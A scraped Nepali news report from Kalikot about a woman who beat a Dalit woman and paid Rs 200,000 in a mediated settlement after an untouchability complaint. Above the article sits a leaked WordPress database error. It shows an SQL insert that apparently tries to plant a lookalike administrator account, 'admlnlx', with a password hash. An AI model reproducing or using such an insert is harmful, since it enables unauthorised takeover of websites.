WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrtmS1alPEXJLDmLPVy9KFweUVnrme0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:34:19', '', 'admlnlx', 'admlnlx')
कालीकोट,माघ १४–
जिल्ला सदरमुकाम मान्मामा दलित महिलालाई कुटपिट गर्ने एक महिलाले रु दुई लाख जरिवाना तिरेकी छिन् ।
थिर्पु– ९ निवासी जानकी वमले आर्थिक लेनदेनका क्रममा सोही गाविस–३ निवासी मालछिना लोहारलाई कुटपिट गर्दा गम्भीर घाइते भएकी लोहारको भेरी अञ्चल अस्पतालमा उपचार भइरहेको छ ।
कुटपिटका क्रममा मालछिना लोहारको ढाड र घाँटीमा गम्भीर चोट लागेको बताइएको छ । मालछिनाका पति करवीर लोहारले जिल्ला प्रशासन कार्यालयमा ज्यान मार्ने र छुवाछूतसम्बन्धी मुद्दा दायर गरेको १५ दिनपछि कार्यालयले उपचारखर्च तिराउनेगरी मिलापत्र गराएको थियो
प्रशासनले उपचार खर्चमात्र दिने नतोकेकामा दुबैपक्षका मध्यस्तकर्ताले रु दुई लाख उपचार खर्चस्वरुप पीडितलाई दिने सहमति भएको बताइएको छ ।- रासस